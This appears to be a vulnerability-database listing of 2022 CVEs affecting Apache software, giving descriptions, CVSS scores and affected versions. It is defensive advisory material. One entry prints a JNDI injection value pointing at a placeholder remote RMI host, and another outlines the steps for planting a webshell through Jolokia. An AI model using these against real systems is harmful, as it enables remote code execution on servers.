Products Affected

Vendor Product Version
apache geode *
CVE-2022-37023

Apache Geode versions prior to 1.15.0 are vulnerable to a deserialization of untrusted data flaw when using REST API on Java 8 or Java 11. Any user wishing to protect against deserialization attacks involving REST APIs should upgrade to Apache Geode 1.15 and follow the documentation for details on enabling "validate-serializable-objects=true" and specifying any user classes that may be serialized/deserialized with "serializable-object-filter". Enabling "validate-serializable-objects" may impact performance.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache geode *
CVE-2022-37392

Improper Check for Unusual or Exceptional Conditions vulnerability in handling the requests to Apache Traffic Server. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-37400

Apache OpenOffice supports the storage of passwords for web connections in the user's configuration database. The stored passwords are encrypted with a single master key provided by the user. A flaw in OpenOffice existed where the required initialization vector for encryption was always the same which weakens the security of the encryption making them vulnerable if an attacker has access to the user's configuration data. This issue affects: Apache OpenOffice versions prior to 4.1.13. Reference: CVE-2022-26306 - LibreOffice

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-37401

Apache OpenOffice supports the storage of passwords for web connections in the user's configuration database. The stored passwords are encrypted with a single master key provided by the user. A flaw in OpenOffice existed where master key was poorly encoded resulting in weakening its entropy from 128 to 43 bits making the stored passwords vulnerable to a brute force attack if an attacker has access to the users stored config. This issue affects: Apache OpenOffice versions prior to 4.1.13. Reference: CVE-2022-26307 - LibreOffice

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-37435

Apache ShenYu Admin has insecure permissions, which may allow low-privilege administrators to modify high-privilege administrator's passwords. This issue affects Apache ShenYu 2.4.2 and 2.4.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache shenyu 2.4.2
apache shenyu 2.4.3
CVE-2022-37436

Prior to Apache HTTP Server 2.4.55, a malicious backend can cause the response headers to be truncated early, resulting in some headers being incorporated into the response body. If the later headers have any security purpose, they will not be interpreted by the client.

Products Affected

Vendor Product Version
apache http_server *
CVE-2022-37865

With Apache Ivy 2.4.0 an optional packaging attribute has been introduced that allows artifacts to be unpacked on the fly if they used pack200 or zip packaging. For artifacts using the "zip", "jar" or "war" packaging Ivy prior to 2.5.1 doesn't verify the target path when extracting the archive. An archive containing absolute paths or paths that try to traverse "upwards" using ".." sequences can then write files to any location on the local fie system that the user executing Ivy has write access to. Ivy users of version 2.4.0 to 2.5.0 should upgrade to Ivy 2.5.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

Products Affected

Vendor Product Version
apache ivy *
CVE-2022-37866

When Apache Ivy downloads artifacts from a repository it stores them in the local file system based on a user-supplied "pattern" that may include placeholders for artifacts coordinates like the organisation, module or version. If said coordinates contain "../" sequences - which are valid characters for Ivy coordinates in general - it is possible the artifacts are stored outside of Ivy's local cache or repository or can overwrite different artifacts inside of the local cache. In order to exploit this vulnerability an attacker needs collaboration by the remote repository as Ivy will issue http requests containing ".." sequences and a "normal" repository will not interpret them as part of the artifact coordinates. Users of Apache Ivy 2.0.0 to 2.5.1 should upgrade to Ivy 2.5.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ivy *
CVE-2022-38054

In Apache Airflow versions 2.2.4 through 2.3.3, the `database` webserver session backend was susceptible to session fixation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-38170

In Apache Airflow prior to 2.3.4, an insecure umask was configured for numerous Airflow components when running with the `--daemon` flag which could result in a race condition giving world-writable files in the Airflow home directory and allowing local users to expose arbitrary file contents via the webserver.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N 1.0 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-38362

Apache Airflow Docker's Provider prior to 3.0.0 shipped with an example DAG that was vulnerable to (authenticated) remote code exploit of code on the Airflow worker host.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-docker *
CVE-2022-38369

Apache IoTDB version 0.13.0 is vulnerable by session id attack. Users should upgrade to version 0.13.1 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache iotdb 0.13.0
CVE-2022-38370

Apache IoTDB grafana-connector version 0.13.0 contains an interface without authorization, which may expose the internal structure of database. Users should upgrade to version 0.13.1 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb 0.13.0
CVE-2022-38398

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to load a url thru the jar protocol. This issue affects Apache XML Graphics Batik 1.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache batik 1.14
CVE-2022-38648

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to fetch external resources. This issue affects Apache XML Graphics Batik 1.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache batik 1.14
CVE-2022-38649

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pinot Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files. This issue affects Apache Airflow Pinot Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Apache Airflow Pinot Provider is installed (Apache Airflow Pinot Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Pinot Provider version 4.0.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-pinot *
CVE-2022-38745

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-39135

Apache Calcite 1.22.0 introduced the SQL operators EXISTS_NODE, EXTRACT_XML, XML_TRANSFORM and EXTRACT_VALUE do not restrict XML External Entity references in their configuration, making them vulnerable to a potential XML External Entity (XXE) attack. Therefore any client exposing these operators, typically by using Oracle dialect (the first three) or MySQL dialect (the last one), is affected by this vulnerability (the extent of it will depend on the user under which the application is running). From Apache Calcite 1.32.0 onwards, Document Type Declarations and XML External Entity resolution are disabled on the impacted operators.

Products Affected

Vendor Product Version
apache calcite *
CVE-2022-39198

A deserialization vulnerability existed in dubbo hessian-lite 3.2.12 and its earlier versions, which could lead to malicious code execution. This issue affects Apache Dubbo 2.7.x version 2.7.17 and prior versions; Apache Dubbo 3.0.x version 3.0.11 and prior versions; Apache Dubbo 3.1.x version 3.1.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo 3.1.0
apache dubbo *
CVE-2022-39944

In Apache Linkis <=1.2.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures a JDBC EC with a MySQL data source and malicious parameters. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.2.0 will be affected, We recommend users to update to 1.3.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2022-40127

A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-40145

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Products Affected

Vendor Product Version
apache karaf *
CVE-2022-40146

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache batik 1.14
CVE-2022-40159

** DISPUTED ** This record was originally reported by the oss-fuzz project who failed to consider the security context in which JXPath is intended to be used and failed to contact the JXPath maintainers prior to requesting the CVE allocation. The CVE was then allocated by Google in breach of the CNA rules. After review by the JXPath maintainers, the original report was found to be invalid.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache commons_jxpath *
CVE-2022-40160

** DISPUTED ** This record was originally reported by the oss-fuzz project who failed to consider the security context in which JXPath is intended to be used and failed to contact the JXPath maintainers prior to requesting the CVE allocation. The CVE was then allocated by Google in breach of the CNA rules. After review by the JXPath maintainers, the original report was found to be invalid.

Products Affected

Vendor Product Version
apache commons_jxpath *
CVE-2022-40189

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pig Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files. This issue affects Pig Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Pig Provider is installed (Pig Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Pig Provider version 4.0.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version.

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-pig *
CVE-2022-40308

If anonymous read enabled, it's possible to read the database file directly without logging in.

Products Affected

Vendor Product Version
apache archiva *
CVE-2022-40309

Users with write permissions to a repository can delete arbitrary directories.

Products Affected

Vendor Product Version
apache archiva *
CVE-2022-40604

In Apache Airflow 2.3.0 through 2.3.4, part of a url was unnecessarily formatted, allowing for possible information extraction.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-40664

Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher.

Products Affected

Vendor Product Version
apache shiro *
CVE-2022-40705

An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache soap *
CVE-2022-40743

Improper Input Validation vulnerability for the xdebug plugin in Apache Software Foundation Apache Traffic Server can lead to cross site scripting and cache poisoning attacks.This issue affects Apache Traffic Server: 9.0.0 to 9.1.3. Users should upgrade to 9.1.4 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-40754

In Apache Airflow 2.3.0 through 2.3.4, there was an open redirect in the webserver's `/confirm` endpoint.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-40954

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Spark Provider, Apache Airflow allows an attacker to read arbtrary files in the task execution context, without write access to DAG files. This issue affects Spark Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Spark Provider is installed (Spark Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Spark Provider version 4.0.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version that has lower version of the Spark Provider installed).

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-spark *
CVE-2022-40955

In versions of Apache InLong prior to 1.3.0, an attacker with sufficient privileges to specify MySQL JDBC connection URL parameters and to write arbitrary data to the MySQL database, could cause this data to be deserialized by Apache InLong, potentially leading to Remote Code Execution on the Apache InLong server. Users are advised to upgrade to Apache InLong 1.3.0 or newer.

Products Affected

Vendor Product Version
apache inlong *
CVE-2022-41131

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Hive Provider, Apache Airflow allows an attacker to execute arbtrary commands in the task execution context, without write access to DAG files. This issue affects Hive Provider versions prior to 4.1.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case HIve Provider is installed (Hive Provider 4.1.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the HIve Provider version 4.1.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version that has lower version of the Hive Provider installed).

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-hive *
CVE-2022-41137

Apache Hive Metastore (HMS) uses SerializationUtilities#deserializeObjectWithTypeInformation method when filtering and fetching partitions that is unsafe and can lead to Remote Code Execution (RCE) since it allows the deserialization of arbitrary data. In real deployments, the vulnerability can be exploited only by authenticated users/clients that were able to successfully establish a connection to the Metastore. From an API perspective any code that calls the unsafe method may be vulnerable unless it performs additional prerechecks on the input arguments.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H 2.8 5.5

Products Affected

Vendor Product Version
apache hive 4.0.0
CVE-2022-41672

In Apache Airflow, prior to version 2.4.1, deactivating a user wouldn't prevent an already authenticated user from being able to continue using the UI or API.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-41678

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution.  In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandler#handlePostRequest is able to create JmxRequest through JSONObject. And calls to org.jolokia.http.HttpRequestHandler#executeRequest. Into deeper calling stacks, org.jolokia.handler.ExecHandler#doHandleRequest can be invoked through refection. This could lead to RCE through via various mbeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl which exists on Java version above 11. 1 Call newRecording. 2 Call setConfiguration. And a webshell data hides in it. 3 Call startRecording. 4 Call copyTo method. The webshell will be written to a .jsp file. The mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia. A more restrictive Jolokia configuration has been defined in default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distributions version including updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache activemq *
CVE-2022-41703

A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag "ALLOW_ADHOC_SUBQUERY" disabled (default value). This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-41704

A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16.

Products Affected

Vendor Product Version
apache batik *
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-42009

SpringEL injection in the server agent in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2022-42252

If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.

Products Affected

Vendor Product Version
apache tomcat *
CVE-2022-42466

Prior to 2.0.0-M9, it was possible for an end-user to set the value of an editable string property of a domain object to a value that would be rendered unchanged when the value was saved. In particular, the end-user could enter javascript or similar and this would be executed. As of this release, the inputted strings are properly escaped when rendered.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache isis *
apache isis 2.0.0
CVE-2022-42467

When running in prototype mode, the h2 webconsole module (accessible from the Prototype menu) is automatically made available with the ability to directly query the database. It was felt that it is safer to require the developer to explicitly enable this capability. As of 2.0.0-M8, this can now be done using the 'isis.prototyping.h2-console.web-allow-remote-access' configuration property; the web console will be unavailable without setting this configuration. As an additional safeguard, the new 'isis.prototyping.h2-console.generate-random-web-admin-password' configuration parameter (enabled by default) requires that the administrator use a randomly generated password to use the console. The password is printed to the log, as "webAdminPass: xxx" (where "xxx") is the password. To revert to the original behaviour, the administrator would therefore need to set these configuration parameter: isis.prototyping.h2-console.web-allow-remote-access=true isis.prototyping.h2-console.generate-random-web-admin-password=false Note also that the h2 webconsole is never available in production mode, so these safeguards are only to ensure that the webconsole is secured by default also in prototype mode.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache isis *
apache isis 2.0.0
CVE-2022-42468

Apache Flume versions 1.4.0 through 1.10.1 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with an unsafe providerURL. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache flume *
CVE-2022-42735

Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958 https://github.com/apache/shenyu/pull/3958 .

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache shenyu 2.5.0
CVE-2022-42889

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
juniper security_threat_response_manager *
juniper security_threat_response_manager 7.5.0
netapp bluexp -
apache commons_text *
CVE-2022-42890

A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.

Products Affected

Vendor Product Version
apache batik *
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-42920

Apache Commons BCEL has a number of APIs that would normally only allow changing specific class characteristics. However, due to an out-of-bounds writing issue, these APIs can be used to produce arbitrary bytecode. This could be abused in applications that pass attacker-controllable data to those APIs, giving the attacker more control over the resulting bytecode than otherwise expected. Update to Apache Commons BCEL 6.6.0.

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 37
fedoraproject fedora 36
apache commons_bcel *
CVE-2022-43396

In the fix for CVE-2022-24697, a blacklist is used to filter user input commands. But there is a risk of being bypassed. The user can control the command by controlling the kylin.engine.spark-cmd parameter of conf.

Products Affected

Vendor Product Version
apache kylin *
CVE-2022-43670

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.0 and prior may allow an authenticated remote attacker to perform a reflected cross site scripting (XSS) attack in the taxonomy management feature.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2022-43717

Dashboard rendering does not sufficiently sanitize the content of markdown components leading to possible XSS attack vectors that can be performed by authenticated users with create dashboard permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43718

Upload data forms do not correctly render user input leading to possible XSS attack vectors that can be performed by authenticated users with database connection update permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43719

Two legacy REST API endpoints for approval and request access are vulnerable to cross site request forgery. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43720

An authenticated attacker with write CSS template permissions can create a record with specific HTML tags that will not get properly escaped by the toast message displayed when a user deletes that specific CSS template record. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43721

An authenticated attacker with update datasets permission could change a dataset link to an untrusted site, users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43766

Apache IoTDB version 0.12.2 to 0.12.6, 0.13.0 to 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. Users should upgrade to 0.13.3 which addresses this issue or use a later version of Java to avoid it.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2022-43982

In Apache Airflow versions prior to 2.4.2, the "Trigger DAG with config" screen was susceptible to XSS attacks via the `origin` query argument.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-43985

In Apache Airflow versions prior to 2.4.2, there was an open redirect in the webserver's `/confirm` endpoint.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-44621

Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request.

Products Affected

Vendor Product Version
apache kylin *
CVE-2022-44635

Apache Fineract allowed an authenticated user to perform remote code execution due to a path traversal vulnerability in a file upload component of Apache Fineract, allowing an attacker to run remote code. This issue affects Apache Fineract version 1.8.0 and prior versions. We recommend users to upgrade to 1.8.1.

Products Affected

Vendor Product Version
apache fineract *
CVE-2022-44644

In Apache Linkis <=1.3.0 when used with the MySQL Connector/J in the data source module, an authenticated attacker could read arbitrary local files by connecting a rogue MySQL server, By adding allowLoadLocalInfile to true in the JDBC parameter. Therefore, the parameters in the JDBC URL should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected.  We recommend users upgrade the version of Linkis to version 1.3.1

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2022-44645

In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures new datasource with a MySQL data source and malicious parameters. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users to upgrade the version of Linkis to version 1.3.1.

Products Affected

Vendor Product Version
apache linkis *
CVE-2022-44729

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16. On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H 1.8 5.2

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache xml_graphics_batik *
CVE-2022-44730

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16. A malicious SVG can probe user profile / data and send it directly as parameter to a URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 1.8 2.5

Products Affected

Vendor Product Version
